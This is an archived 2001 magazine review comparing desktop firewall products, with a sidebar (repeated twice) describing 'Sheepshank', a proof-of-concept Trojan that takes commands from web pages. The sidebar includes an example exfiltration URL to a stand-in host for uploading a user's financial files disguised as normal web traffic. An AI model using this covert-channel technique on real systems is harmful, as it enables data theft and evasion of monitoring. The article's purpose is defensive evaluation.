A rchive Date
[ 31-12-2001 ]
Category
[ Information Technologies ]
sub-Categoy
[ Networking ]
|
[http://hackyourself.com/showarticle.dyn?article=http://www.techweb.com/tech/security/20011203_security
No Desktop is an Island
November 12, 2001
By Michael J. DeMaria
Individual desktops may be the biggest security hole in your network. That includes desktops of all kinds: those used by home-based telecommuters and laptop-wielding road warriors, and your average office-based desktop PCs.
In the age of feudalism, medieval towns were surrounded by thick stone walls. Sometimes attackers would charge these perimeter walls, but this took a lot of time, and it was risky. It was also hard to do without drawing lots of attention. Eventually, bands of attackers would take the time to befriend someone on the inside. That person would quietly rob his neighbors, then throw the loot over the wall in the middle of the night. An inside job usually works better.
In this modern age of computer security, network-based Trojan programs are like the guys on the inside. Virus scanners can't always identify Trojan programs, especially those that are new or not so highly circulated that a signature has been found. The best protection against this sort of attack is a desktop firewall.
Desktop firewalls are effective against intruders lurking behind the main lines as well. Packet monitoring, intrusion detection, port blocking and application control can help prevent Trojan viruses and other nasty programs from creeping into your network.
Getting a Trojan onto someone's computer isn't hard -- just look at the e-mail viruses and worms going around. All it takes is an e-mail attachment with something cute, like dancing hamsters. Or, if you really have an ax to grind, loading a Trojan using a simple floppy is easy enough. Before we began our testing for this review, we did an unscientific experiment. We took just 17 seconds to walk up to a PC in the lab, install a Sub7 Trojan off a floppy disk and walk away whistling.
But keep in mind, a firewall won't protect you from a Trojan that is aimed at unlinking every file from the system. Using antivirus software in tandem with personal firewalls is a must.
The Roundup
In the review of desktop firewalls we ran last year, we tested products from F-Secure Corp., InfoExpress, Sybergen Networks and Network ICE Corp. This year we have the same four vendors going against each other, though two have changed their names. Network ICE was recently acquired by Internet Security Systems (ISS), and Sybergen is now known as Sygate Technologies.
We also asked Symantec Corp. to participate, but its product doesn't have centralized reporting. Securitae Corp. was also invited, but its product was in beta at test time. Finally, we tried getting Zone Labs to participate but, like the last time around, the company was still working on adding centralized management. Like Securitae, ZoneAlarm was in beta during our test period.
Last year InfoExpress' CyberArmor Suite 1.1 won our Editor's Choice award. CyberArmor repeats this year with the best protection capabilities, great support for mobile users and good policy management. Sygate Secure Enterprise has improved markedly over the past year and is now neck and neck with CyberArmor in most features. The InfoExpress and Sygate products both support fault-tolerant servers, while the other two do not. ISS and F-Secure haven't advanced much since last year, and offer less protection than their competitors.
All the products we tested work in a similar way. Each desktop is loaded with a client agent that sits as a shim, intercepting and inspecting all data going into or out of the machine. These agents inspect, protect and send back status reports. A back-end server (or multiple servers) sits on the LAN, distributing policies and maintaining log reports.
Before rolling out a desktop firewall program, allocate the appropriate resources for the support and helpdesk issues that will inevitably arise. If you block certain programs from running, users will call up and ask, "Why is the network broken?" Provide user education on how the firewall works and what sort of traffic is blocked. You'll definitely get a lot of questions from home-based telecommuters if you don't prepare your users.
We looked at the firewalls from the viewpoint of a corporation planning to roll out 5,000 desktop firewalls in phases, by department. Our grading criteria included policy management, protection, mobile-user support, price and reporting. We tested from the perspective of a corporate IT office with full say over the security and policy files, letting the user have as little interaction with the firewall as possible.
All the products we tested offer standalone installers with the necessary configurations already in place (such as the IP address of the administration server). We wanted to see how well you could create different policies for multiple users or machines. For example, the engineers -- and nobody else -- may need FTP access. Every product supports this capability. We also tested how easy it is to switch users to different groups, in case of reorganizations, merging departments or individual job changes.
InfoExpress CyberArmor Suite 2.1 Enterprise Personal Firewall
Each solution we looked at supports dynamic IP addresses. InfoExpress and Sygate offer the best support for mobile users, allowing for multiple policy files depending on the location. InfoExpress offers more granularity than Sygate. F-Secure allows for four policy files per client, but the catch is the user must switch them manually. ISS doesn't offer any support for multiple policy files based on location.
Application Control a Must
The use of port blocking as a primary mechanism for securing desktops is way over. It used to be that if you wanted to stop people from connecting to a Trojan-infected laptop, you could simply block all incoming connections. Not anymore.
Some Trojans will use outgoing connections with traffic that looks legitimate to fool firewalls and intrusion-detection systems. Other Trojans, like Sub7, can e-mail out key grabs or make announcements to IRC (Internet Relay Chat) channels. All this traffic looks legitimate, so simply blocking outbound traffic to remote Port 80 or 25 won't work. (For more, see our online-only story "How Trojan Viruses Work -- a New Wrinkle.")
In this era of smart viruses, the only truly worthwhile desktop firewall supports application control. This firewall will grant individual executables access to the network. Along with that, the firewall needs to use a checksum, such as an MD5 (Message Digest 5) hash, to make sure the executable itself hasn't been modified or compromised. InfoExpress and Sygate both offer this capability; F-Secure and ISS don't.
The selection of desktop firewalls dwindles dramatically when you look for centralized management. By the end of the year, only six such products will be available -- the four in this review plus those of Securitae and Zone Labs. These products vary in price from as as little as $37 per seat to as much as $80, depending on quantity. That's a small price to pay for the protection they offer.
Perimeter firewalls can't protect your network entirely now that the baddies have figured out it's much easier to get by individual desktops. Antivirus software is helpful, but its makers are always playing catch-up with the latest Trojan programs. Intrusion-detection systems may not catch the latest Trojan either. And once a Trojan gets onto your network, it can spread. Still, desktop firewalls are a critical line of defense in the never-ending battle to keep your network secure.
Although CyberArmor won our Editor's Choice award, InfoExpress should beware. The other vendors are closing in. CyberArmor still demonstrates the best ability to switch between multiple policies and has the best application control among our test group.
The suite comprises six components. CyberArmor Policy Expert is used to edit policy files. CyberServer is the management software for distributing policies and accepting log file uploads. CyberBridge is used in conjunction with Microsoft Internet Information Server (IIS) to simplify policy downloads and make it easier to switch users to different groups. CyberConsole and CyberReports are for viewing users and alerts. CyberArmor Personal Firewall is the agent software.
The executable blocking is among the most flexible we tested this time out. It uses PERL-style regular expressions to block or allow programs by name, wild card and command-line argument. You can also block spawned programs, including those that might come with e-mail attachments. This would let you block .vbs scripts from Microsoft Outlook Express, but allow .shs from Eudora if you like.
The user can be informed of a reason the program was prevented from running, and the administrator can decide whether to generate an alarm to the user and the central management station.
You can verify executables with an MD5-based checksum. The policy editor lets you scan an executable or directory and builds a database of checksums. CyberArmor's application control is solid. It was able to block the Sheepshank Trojan.
The Policy Expert's interface has been improved over version 1.1's, which we tested last year. It was simplified to ease the creation of configurations and templates, which are used as the sets of rules you want to implement. The different configurations help change network settings, and download servers, VPNs and so forth. All changes in a template affect the configurations that are built from it. The capability to have one set of policies in place and let it take effect across multiple remote offices is a real boon.
As in the earlier version, there are multiple levels of complexity, from simple clicking check boxes to manually editing policies. Most of the new interface is wizard-based, so it doesn't supply you with every option possible. You can go back to the version 1.1 interface for more fine-tuned control, but it's a bit ugly because you're basically editing text files. Editing multiple policies has become much more straightforward. You can create installers for these different configurations.
The newest component is CyberBridge, which greatly simplifies changing users and groups. CyberBridge works with IIS via a PHP script to link the Web server with the policy and user database. Via CyberConsole, you can move individual users into a different group or move all the users in one group into a different group. Then, when the clients check for updates from the CyberServer, it changes groups and gets the new policy file.
When the user installs the client software, you can have the user enter his or her user name and e-mail address. On one of the clients, we entered mdemaria, which we could immediately see in the CyberConsole. You can then lock the user from changing the user name and password.
You can also set a password on the CyberArmor Personal Firewall configuration screen, so the user can't modify any of the settings. These settings include shutting off the firewall, and changing the update interval or trusted IP addresses. You don't want your users turning off the firewall on a whim. But what if you have a salesperson at a remote site, with no access back to the corporate network, and he or she needs to let someone connect to his machine? CyberArmor allows a one-time override for this type of situation.
The client generates a one-time cookie, which is an eight-digit number. You then use the Policy Expert to type the first four characters of the configuration password and the cookie provided by the user. This produces a one-time eight-character password. The user can use this password to override the normal setup password and change his or her settings. The only thing you can't change with the one-time password is any of the other setup passwords.
CyberArmor does not let you generate a one-time password without knowing part of the setup password. CyberArmor is the only product we tested that allows for this emergency-override capability, even when the client can't connect back to the network. This is a handy feature, especially if someone is stuck in the field.
CyberArmor Suite 2.1 Enterprise Personal Firewall. InfoExpress, (650) 623-0260; fax (650) 623-0268. www.infoexpress.com
Sygate Technologies Sygate Secure Enterprise and Sygate Management Server
The Sybergen product came in last place in our review last year. This year it comes back with a new name -- Sygate Secure Enterprise -- and is much improved. The portion of the suite we tested is called Sygate Management Server. Our testing revealed a cleaner interface, better documentation and easier policy creation and management than previous iterations. Sygate now also supports failover policy and database servers.
This product requires the use of a SQL or Oracle database and IIS, which powers the back end just as CyberArmor and ISS' BlackICE Agent and ICEcap Manager do. The management is done through a Java applet. The Java applet was manageable, but the manual process of locking and unlocking groups was sluggish. Locking prevents two administrators from working on the same group at once.
The philosophy behind the administration user interface is inheritance. Each group inherits the policies of the parent group. For example, you can create a group of computers called Sales, and inside that create another group called East Coast and West Coast. Changes to the Sales group will also affect East Coast and West Coast.
There are two ways of grouping things together: by computers or by users. Computers autoregister with the administration server. Users can be added manually or imported from a Windows NT domain or LDAP server. You can then set policy files on users or computers. This way you can grant more freedom or give users access to different applications across your domain. A computer policy file overrides the user policy. In the course of our testing we found switching users from group to group easy.
Setting multiple policy files depending on the user's location is also easy. This can be done by looking at the gateway MAC (Media Access Control) address, client IP address, subnet or MAC address of a DHCP server. It's nice but not as full-featured as CyberArmor, which lets you do all this, as well as resolve DNS and check VPN registry keys. Like CyberArmor, Sygate Management Server was able to stop the Sheepshank Trojan.
The reporting in Sygate Secure Enterprise has improved. You can more easily generate reports for individual users, groups, computers or the entire organization. If you want a more in-depth look, you can view each blocked attempt. Rules are assigned a severity level from 0 to 15. You can sort the logs by severity, with the more important attacks and violations bubbling to the top. We made blocking outgoing telnet the highest severity and incoming TCP 80 the lowest. Each time we ran telnet, it showed up at the top of the report. The graphical report generation is a nice touch for making Microsoft PowerPoint slides.
You can add rules based on application name, path, file size, checksum, network information, ports, protocols or time. For example, you might want to shut down both incoming and outgoing traffic whenever your employees are out of the building--perhaps nights and weekends. You can also create rules that apply only when the VPN connection is up. You might want to have instant-messaging software active only when the VPN tunnel is up, for example. InfoExpress' CyberArmor is the only other vendor with this feature.
If multiple rules have the same priority, the rule created first gets priority. This was a bit irritating during our testing. If you don't plan ahead, introducing a fresh rule for the top of the list can be tough. It would be handy to have a way to change the order of rules with the same severity level more easily.
Sygate Secure Enterprise and Sygate Management Server. Sygate Technologies, 1-877-923-7436; fax (510) 742-2699. www.sygate.com
F-Secure Distributed Firewall
Once again, we came away from our tests of F-Secure's product convinced it is best-suited for inside the corporate LAN. It's not going to be of much use to mobile users, at least not in this iteration.
You can create four profiles: Home, Office, Aux1 and Aux2. The user selects which profile reflects his or her current location. There's no support for real application control, which means the Sheepshank Trojan was able to get through. The limited application control F-Secure does offer is based on the run-time name. The product also lacks integrity checking (such as MD5 checksum), so any program that is on the approved list could be modified.
Like Sygate Management Server, F-Secure's administration supports inheritance. You can create a policy domain, and all subdomains or computers inside it inherit the traits of the parent. Settings dependent on the parent are colored gray unique settings to the current domain are in black. This makes it easy to change settings and see where the changes occur.
Rule setting is rudimentary at best. Rules are still a matter of cutting off certain parts of the network from other parts. Devices are identified by either IP address, DNS name, WINS name or VPN key.
This product is definitely falling behind the competition, but there are a few bright spots. The user-management capabilities are still quite good. Also, you can centrally manage your antivirus, VPN, firewall and smartcards from one console. In a corporate environment where desktops are stationary, that's a plus. But overall, F-Secure is limited to port blocking.
F-Secure Distributed Firewall. F-Secure, (408) 938-6700, (888) 718-4928; fax (408) 938-6701. www.f-secure.com
Internet Security Systems ICEcap Manager with BlackICE Agent
This time out, the ISS duo comes in last. BlackICE still does not support multiple policy files per agent, and it doesn't have any support for application control, though this is planned for future releases. On the plus side, the ICEcap management-server user interface has been refined, and it is much cleaner and less confusing.
The agent program is an inbound firewall and IDS product. It can block ports for incoming traffic but not outgoing. For example, we couldn't block outbound telnet traffic. During our testing, we loaded Sub7 on the agent and tried to connect to it from our attack machine. BlackICE did identify the signature and blocked it. But as with many antivirus solutions, this approach doesn't work against unknown Trojans. We did the same thing with Sheepshank, and we were able to get through easily.
At the heart of this suite is the management console, called ICEcap. ICEcap is controlled using a Web server running IIS and a SQL database. One of the new features in ICEcap is the addition of Help Wizards, which is a combination of flow charts and documentation to facilitate setting up the software. It's a good thing this feature has been added, as this is the still the most complex product to set up among our test group.
During setup, policy files were flying all over the place. There are separate policies for firewall rules, IDS rules, installation configurations and response rules, and we weren't sure how they all interacted without slogging through the docs to figure out what goes where.
The reporting capabilities within ICEcap remain solid. The graphs are perfect for overhead projection at security meetings. And drill-down capabilities are excellent. For example, if you're looking at the top attack signatures, you can click on the most common signature and see all the clients that reported the attack.
BlackICE also includes an event dampener, so if two attacks occur within a time frame, they're treated and reported as one attack (the total number is still shown). During testing, we were able to see that we had 24 Sub7 attacks, but that each set of attacks occurred only three times. The first day of testing we had four hits, the second day eight and the third day 12 in a row. The final neat thing is you can make SQL queries directly from the management interface; no other vendor offers this feature. For those of you who know some SQL, it's a nice feature doing for quick and dirty queries.
BlackICE Agent and ICEcap Manager. Internet Security Systems, (650) 532-4100; fax (650) 341-0719. www.networkice.com
Michael J. DeMaria is an associate technology editor based at Network Computing's Syracuse University Real-World Labs®. Send your comments on this article to him at mdemaria@nwc.com.
How Trojan Viruses Work -- A New Wrinkle
Traditionally, Trojan programs wait for incoming connections to the compromised machine. Because the Trojan is just a regular program, it has full access to whatever a normal program can do: It can read files, delete files, access the network, upload files and so forth. You rely on an antivirus program to find and disinfect a Trojan, and use a firewall to control and contain it. On a corporate firewall, you block all the unnecessary ports (both in and out), and limit the destination of incoming connections.
On a desktop machine, you can set it up so all incoming connections are dropped. This will defeat most inbound Trojan programs, such as BackOrifice or Sub 7. But now there's a new method available that gets around port blocking and intrusion detection: Make an outbound connection to an already compromised machine using legitimate network traffic.
The idea of an outbound connection with legitimate traffic is something I came up with over the past year. I don't have any experience with network coding or Winsock programming, so for this project I was assisted by Ifeanyi Echeruo in developing a Trojan program we dubbed "Sheepshank." It took Echeruo, a graduate student in the Engineering College at Syracuse University, less than three hours to get a working prototype of Sheepshank up and running. When run, this program makes an HTTP get request to a Web server, just like Netscape Communicator or Microsoft Internet Explorer would do. The Web server returns a Web page, which has keywords in it.
For example, the page may say "<html><body>clearwallpaper</body></html>." The Trojan ignores the parts that it doesn't understand, and sees the keyword clearwallpaper. Source code, precompiled binaries and example usage is available at nwc.syr.edu/~mdemaria/sheepshank.
While clearing the wallpaper may sound trivial, there are many other things you can do. For example, you can upload the contents of c:\quicken\myfinancialdata in segments by using "http://www.compromised.comp/upload.cgi?
file=myfinancialdata&payload=AAD3B4351404EE" and just have a cgi script on the compromised machine piece the chunks together. If a network analyzer is used, it all looks like normal HTTP and HTML traffic. And if you select the keywords carefully, and change some of the command strings, then intrusion-detection systems would have a very difficult time stopping it. Because this is all valid Web traffic, there's very little chance you'll want to block outbound Port 80. This technique is more traceable than most Trojans, because it requires an already compromised machine. A savvy intruder will have the messages bounce around multiple locations on the Internet to avoid being traced.
What's the solution? Well, you must go beyond port blocking and intrusion detection, and that next step is in application control. You should specify which programs on each machine are allowed to access the network. Furthermore, be sure there's a way to check application integrity, otherwise it's possible to bundle a Trojan onto an approved application. Many vendors accomplish this by doing an MD5 hash on the executable -- if the executable is modified, the hashes won't match up.
Traditionally, Trojan programs wait for incoming connections to the compromised machine. Because the Trojan is just a regular program, it has full access to whatever a normal program can do: It can read files, delete files, access the network, upload files and so forth. You rely on an antivirus program to find and disinfect a Trojan, and use a firewall to control and contain it. On a corporate firewall, you block all the unnecessary ports (both in and out), and limit the destination of incoming connections.
On a desktop machine, you can set it up so all incoming connections are dropped. This will defeat most inbound Trojan programs, such as BackOrifice or Sub 7. But now there's a new method available that gets around port blocking and intrusion detection: Make an outbound connection to an already compromised machine using legitimate network traffic.
The idea of an outbound connection with legitimate traffic is something I came up with over the past year. I don't have any experience with network coding or Winsock programming, so for this project I was assisted by Ifeanyi Echeruo in developing a Trojan program we dubbed "Sheepshank." It took Echeruo, a graduate student in the Engineering College at Syracuse University, less than three hours to get a working prototype of Sheepshank up and running. When run, this program makes an HTTP get request to a Web server, just like Netscape Communicator or Microsoft Internet Explorer would do. The Web server returns a Web page, which has keywords in it. For example, the page may say "<html><body>clearwallpaper</body></html>." The Trojan ignores the parts that it doesn't understand, and sees the keyword clearwallpaper. Source code, precompiled binaries and example usage is available at nwc.syr.edu/~mdemaria/sheepshank <http://nwc.syr.edu/~mdemaria/sheepshank>.
While clearing the wallpaper may sound trivial, there are many other things you can do. For example, you can upload the contents of c:\quicken\myfinancialdata in segments by using "http://www.compromised.comp/upload.cgi?
file=myfinancialdata&payload=AAD3B4351404EE" and just have a cgi script on the compromised machine piece the chunks together. If a network analyzer is used, it all looks like normal HTTP and HTML traffic. And if you select the keywords carefully, and change some of the command strings, then intrusion-detection systems would have a very difficult time stopping it. Because this is all valid Web traffic, there's very little chance you'll want to block outbound Port 80. This technique is more traceable than most Trojans, because it requires an already compromised machine. A savvy intruder will have the messages bounce around multiple locations on the Internet to avoid being traced.
What's the solution? Well, you must go beyond port blocking and intrusion detection, and that next step is in application control. You should specify which programs on each machine are allowed to access the network. Furthermore, be sure there's a way to check application integrity, otherwise it's possible to bundle a Trojan onto an approved application. Many vendors accomplish this by doing an MD5 hash on the executable -- if the executable is modified, the hashes won't match up.]
|